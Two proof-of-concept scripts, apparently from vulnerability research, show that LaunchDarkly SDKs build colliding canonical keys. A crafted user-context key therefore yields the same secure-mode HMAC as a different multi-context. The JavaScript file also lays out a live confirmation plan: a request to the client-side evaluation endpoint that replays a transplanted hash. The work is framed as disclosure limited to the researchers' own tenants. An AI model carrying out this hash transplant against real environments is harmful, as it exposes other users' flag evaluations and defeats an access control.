File: tools/poc-canonicalkey-collision.py
#!/usr/bin/env python3
"""
PoC (Python) — same canonicalKey collision, proved with the REAL python-server-sdk class.

Loads sdk/python-server-sdk/ldclient/context.py unmodified (it is stdlib-only) and shows that a
single-kind `user` context and a multi-context can produce the SAME fully_qualified_key, hence the
SAME secure-mode HMAC — which is what the client-side `h` parameter is validated against.

Companion to tools/poc-canonicalkey-collision.js (node-server-sdk + js-core).

Usage: python3 tools/poc-canonicalkey-collision.py [outDir]
No network. No credentials.
"""
import hashlib
import hmac
import importlib.util
import json
import os
import sys

REPO = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..')
CTX_PY = os.path.join(REPO, 'sdk', 'python-server-sdk', 'ldclient', 'context.py')
OUT = sys.argv[1] if len(sys.argv) > 1 else os.path.join(REPO, 'findings', 'F-002-canonicalkey-collision')
os.makedirs(OUT, exist_ok=True)

if not os.path.exists(CTX_PY):
    sys.exit(f"missing {CTX_PY}\n  git clone --depth 1 https://github.com/launchdarkly/python-server-sdk sdk/python-server-sdk")

spec = importlib.util.spec_from_file_location('ld_context_real', CTX_PY)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
Context = mod.Context

lines = []
def say(s=''):
    lines.append(s)
    print(s)

DEMO_KEY = b'sdk-00000000-0000-0000-0000-000000000000'  # dummy; any key shows the equality

say('# canonicalKey / fully_qualified_key collision — python-server-sdk (real SDK class)')
say(f'source: {os.path.relpath(CTX_PY, REPO)}')
say('')

pairs = [
    # (single-kind user context, colliding multi-context)
    ('org:o1:user:u1', [('org', 'o1'), ('user', 'u1')]),
    ('session:1234:user:5678', [('session', '1234'), ('user', '5678')]),
    ('device:abc:user:xyz', [('device', 'abc'), ('user', 'xyz')]),
    # three-kind collision
    ('org:o1:team:t1:user:u1', [('org', 'o1'), ('team', 't1'), ('user', 'u1')]),
]

collisions = 0
for user_key, multi_parts in pairs:
    A = Context.create(key=user_key, kind='user')
    B = Context.create_multi(*[Context.create(key=k, kind=kd) for kd, k in multi_parts])
    fqk_a, fqk_b = A.fully_qualified_key, B.fully_qualified_key
    h_a = hmac.new(DEMO_KEY, fqk_a.encode(), hashlib.sha256).hexdigest()
    h_b = hmac.new(DEMO_KEY, fqk_b.encode(), hashlib.sha256).hexdigest()
    eq = fqk_a == fqk_b
    collisions += eq
    say(f'A = single-kind user context   key={user_key!r}')
    say(f'B = multi-context              {json.dumps({kd: k for kd, k in multi_parts})}')
    say(f'   A.fully_qualified_key = {fqk_a!r}')
    say(f'   B.fully_qualified_key = {fqk_b!r}')
    say(f'   COLLISION = {eq}   identical secure-mode HMAC = {h_a == h_b}')
    if eq:
        say(f'   hmac = {h_a}')
    say('')

say(f'collisions: {collisions}/{len(pairs)}')
say('')

# the secondary vector (':' inside a KIND) is blocked by SDK-side kind validation — record it
bad = Context.create(key='d', kind='a:b:c')
say(f"secondary vector — kind 'a:b:c': error = {bad.error!r}")
say('  (kind names are validated, so the exploitable asymmetry is the un-escaped *key* of a')
say("   'user'-kind context; keys are free-form strings and are not validated for colons)")
say('')

# what the escaping rule is, quoted from the SDK itself
say('the escaping rule as implemented (context.py):')
say("  _escape_key_for_fully_qualified_key: key.replace('%', '%25').replace(':', '%3A')")
say("  single kind: full_key = key if kind == DEFAULT_KIND else '%s:%s' % (kind, escape(key))")
say("  multi kind : ':'.join(kind + ':' + escape(key) for each kind, sorted by kind)")
say("  -> escape() is skipped exactly when kind == 'user', while multi-context keys ARE escaped.")
say('     Any user key of the form "<kind1>:<key1>:<kind2>:<key2>" therefore impersonates a')
say('     multi-context (and vice versa) for every consumer of fully_qualified_key: secure-mode')
say('     HMAC, event/context deduplication and cache keys.')

with open(os.path.join(OUT, 'poc-output-python.txt'), 'w') as f:
    f.write('\n'.join(lines) + '\n')
say('')
say(f'written: {os.path.join(OUT, "poc-output-python.txt")}')

File: tools/poc-canonicalkey-collision.js
#!/usr/bin/env node
/**
 * PoC — LaunchDarkly context canonicalKey is NOT injective (secure-mode hash transplant)
 *
 * Runs the REAL SDK function: node-server-sdk/context.js → getCanonicalKey()
 * (repo name ends in `-sdk`, i.e. in the program's accepted SDK scope) and compares it against
 * a verbatim transcription of js-core's implementation
 * (js-core/packages/shared/common/src/Context.ts, `canonicalKey` getter + `encodeKey`).
 *
 * The asymmetry: `encodeKey()` escapes ':' -> '%3A' and '%' -> '%25', but it is applied ONLY to
 * non-`user` kinds. A single-kind `user` context returns its key RAW. So a user context whose key
 * contains colons produces the same canonicalKey as a multi-context.
 *
 * Why it matters: secure mode = HMAC-SHA256(sdkKey, canonicalKey). If two DIFFERENT contexts share
 * a canonicalKey, a hash legitimately issued for one authorises evaluation of the other, which
 * defeats the documented guarantee that "one end user cannot inspect the variations for another
 * end user" (launchdarkly.com/docs/sdk/features/secure-mode).
 *
 * Usage: node tools/poc-canonicalkey-collision.js [outDir]
 * No network access. No credentials. Pure local computation over public SDK source.
 */
'use strict';

const path = require('path');
const fs = require('fs');

// ---- 1. the real SDK implementation (node-server-sdk, a `-sdk` repo) -------------------------
const sdkDir = path.join(__dirname, '..', 'sdk', 'node-server-sdk');
let realGetCanonicalKey = null;
try {
  // eslint-disable-next-line global-require, import/no-dynamic-require
  ({ getCanonicalKey: realGetCanonicalKey } = require(path.join(sdkDir, 'context.js')));
} catch (e) {
  console.error(`!! could not require ${sdkDir}/context.js (${e.message})`);
  console.error('   clone it first:  git clone --depth 1 https://github.com/launchdarkly/node-server-sdk sdk/node-server-sdk');
  process.exit(2);
}

// ---- 2. verbatim transcription of js-core's logic (shared/common/src/Context.ts) -------------
function encodeKey_jscore(key) {
  if (key.includes('%') || key.includes(':')) {
    return key.replace(/%/g, '%25').replace(/:/g, '%3A');
  }
  return key;
}
// js-core builds a Context object; this reproduces the canonicalKey getter for a plain context
// literal, including its rule that a multi-context's kinds are sorted and joined with ':'.
function canonicalKey_jscore(ctx) {
  if (ctx.kind === 'multi') {
    return Object.keys(ctx)
      .filter((k) => k !== 'kind')
      .sort()
      .map((kind) => `${kind}:${encodeKey_jscore(ctx[kind].key)}`)
      .join(':');
  }
  if (ctx.kind === 'user' || ctx.kind === undefined || ctx.kind === null) {
    return ctx.key; // <-- RAW: no encodeKey
  }
  return `${ctx.kind}:${encodeKey_jscore(ctx.key)}`;
}

const outDir = process.argv[2] || path.join(__dirname, '..', 'findings', 'F-002-canonicalkey-collision');
fs.mkdirSync(outDir, { recursive: true });
const log = [];
const say = (s = '') => { log.push(s); console.log(s); };

say('# canonicalKey collision PoC');
say(`node-server-sdk: ${path.join(sdkDir, 'context.js')}`);
say(`js-core transcription: packages/shared/common/src/Context.ts (encodeKey + canonicalKey getter)`);
say('');

// ---- 3. the headline collision ---------------------------------------------------------------
const A = { kind: 'user', key: 'org:o1:user:u1' };                      // single-kind user
const B = { kind: 'multi', org: { key: 'o1' }, user: { key: 'u1' } };   // multi-context

say('## 1. Headline collision');
say(`A = ${JSON.stringify(A)}`);
say(`B = ${JSON.stringify(B)}`);
say('');
for (const [name, fn] of [['node-server-sdk getCanonicalKey', realGetCanonicalKey],
                          ['js-core canonicalKey (transcribed)', canonicalKey_jscore]]) {
  const ka = fn(A);
  const kb = fn(B);
  say(`${name}:`);
  say(`  canonicalKey(A) = ${JSON.stringify(ka)}`);
  say(`  canonicalKey(B) = ${JSON.stringify(kb)}`);
  say(`  COLLISION: ${ka === kb}`);
  say('');
}

// ---- 4. HMAC consequence (secure mode) -------------------------------------------------------
const crypto = require('crypto');
const secureModeHash = (sdkKey, ctx, fn) =>
  crypto.createHmac('sha256', sdkKey).update(fn(ctx)).digest('hex');
const DEMO_SDK_KEY = 'sdk-00000000-0000-0000-0000-000000000000'; // dummy; no real key needed
say('## 2. Secure-mode consequence (HMAC-SHA256(sdkKey, canonicalKey))');
say(`dummy sdk key: ${DEMO_SDK_KEY}`);
const hA = secureModeHash(DEMO_SDK_KEY, A, realGetCanonicalKey);
const hB = secureModeHash(DEMO_SDK_KEY, B, realGetCanonicalKey);
say(`  h(A) = ${hA}`);
say(`  h(B) = ${hB}`);
say(`  IDENTICAL HASH FOR TWO DIFFERENT CONTEXTS: ${hA === hB}`);
say('  → a hash issued by the customer backend for context A is accepted for context B.');
say('');

// ---- 5. systematic collision search ----------------------------------------------------------
say('## 3. Systematic collision search (kinds/keys that a normal app could produce)');
const kinds = ['user', 'org', 'organization', 'device', 'session', 'tenant', 'team'];
const keys = ['u1', 'o1', 'd1', 's1', 'alice', 'acme', 'user', 'org'];
const singles = [];
for (const kind of kinds) for (const key of keys) singles.push({ kind, key });
// also single-kind user contexts whose key embeds a "kind:key" pair (the collision generator)
const crafted = [];
for (const k1 of kinds) for (const v1 of keys) for (const k2 of kinds) for (const v2 of keys) {
  crafted.push({ kind: 'user', key: `${k1}:${v1}:${k2}:${v2}` });
}
const multis = [];
for (const k1 of kinds) for (const v1 of keys) for (const k2 of kinds) for (const v2 of keys) {
  if (k1 === k2) continue;
  multis.push({ kind: 'multi', [k1]: { key: v1 }, [k2]: { key: v2 } });
}
const all = [...singles, ...crafted, ...multis];
const byCanonical = new Map();
let collisions = 0;
const examples = [];
for (const ctx of all) {
  const ck = realGetCanonicalKey(ctx);
  if (byCanonical.has(ck)) {
    collisions += 1;
    if (examples.length < 12) examples.push([ck, byCanonical.get(ck), ctx]);
  } else {
    byCanonical.set(ck, ctx);
  }
}
say(`  contexts generated: ${all.length} (${singles.length} single, ${crafted.length} crafted-user, ${multis.length} multi)`);
say(`  distinct canonicalKeys: ${byCanonical.size}`);
say(`  COLLIDING pairs found: ${collisions}`);
say('');
say('  first collisions (canonicalKey ← two different contexts):');
for (const [ck, c1, c2] of examples) {
  say(`    ${JSON.stringify(ck)}`);
  say(`      ← ${JSON.stringify(c1)}`);
  say(`      ← ${JSON.stringify(c2)}`);
}
say('');

// ---- 6. do both implementations agree? (cross-SDK consistency) -------------------------------
say('## 4. Cross-implementation agreement');
let disagree = 0;
for (const ctx of all) {
  if (realGetCanonicalKey(ctx) !== canonicalKey_jscore(ctx)) {
    disagree += 1;
    if (disagree <= 5) say(`  DISAGREE on ${JSON.stringify(ctx)}: node=${realGetCanonicalKey(ctx)} js-core=${canonicalKey_jscore(ctx)}`);
  }
}
say(`  disagreements: ${disagree} / ${all.length}`);
say('  (agreement means this is a shared SPEC-level flaw, not one SDK typo: the same collision');
say('   exists in every SDK that follows the canonicalKey spec, and therefore on the server,');
say('   which must compute the same value to verify the `h` parameter.)');
say('');

// ---- 7. the second asymmetry: kind names are not encoded ------------------------------------
say('## 5. Secondary asymmetry — KIND names are never encoded');
const C = { kind: 'a:b:c', key: 'd' };                                  // kind containing colons
const D = { kind: 'multi', a: { key: 'b' }, c: { key: 'd' } };          // multi
say(`C = ${JSON.stringify(C)}`);
say(`D = ${JSON.stringify(D)}`);
say(`  node-server-sdk: canonicalKey(C)=${JSON.stringify(realGetCanonicalKey(C))}  canonicalKey(D)=${JSON.stringify(realGetCanonicalKey(D))}`);
say(`  COLLISION: ${realGetCanonicalKey(C) === realGetCanonicalKey(D)}`);
say('  (exploitable only if the service accepts context kinds containing ":" — context-kind');
say('   naming rules are enforced server-side, so this vector needs live confirmation; the');
say('   user-key vector in §1 needs no unusual kind names at all.)');
say('');

// ---- 8. what a live confirmation looks like (documented, NOT executed here) ------------------
say('## 6. Live confirmation plan (not executed by this script)');
say('  Requires an environment with secure mode ON and a backend that signs a context key the');
say('  attacker can influence (username, tenant slug, device id, session id, etc.):');
say('   1. backend signs A = {kind:"user", key:"org:<victimOrg>:user:<victimUser>"}  → h');
say('   2. attacker calls the client-side eval route with B = {kind:"multi",');
say('      org:{key:"<victimOrg>"}, user:{key:"<victimUser>"}} and h from step 1:');
say('        GET https://app.launchdarkly.com/sdk/evalx/{clientSideId}/contexts/{b64url(B)}?h={h}&withReasons=true');
say('   3. expected (secure): 4xx invalid hash.  observed if vulnerable: 200 + B\'s flag values,');
say('      i.e. the victim multi-context was evaluated using a hash issued for a different context.');
say('  Only our own tenants/environments are used; stop at proof and report.');

fs.writeFileSync(path.join(outDir, 'poc-output.txt'), log.join('\n') + '\n');
fs.writeFileSync(path.join(outDir, 'collision-examples.json'),
  JSON.stringify({ headline: { A, B, canonicalKey: realGetCanonicalKey(A) }, systematic: examples.map(([ck, c1, c2]) => ({ canonicalKey: ck, contexts: [c1, c2] })) }, null, 1));
say('');
say(`written: ${path.join(outDir, 'poc-output.txt')}`);
say(`written: ${path.join(outDir, 'collision-examples.json')}`);
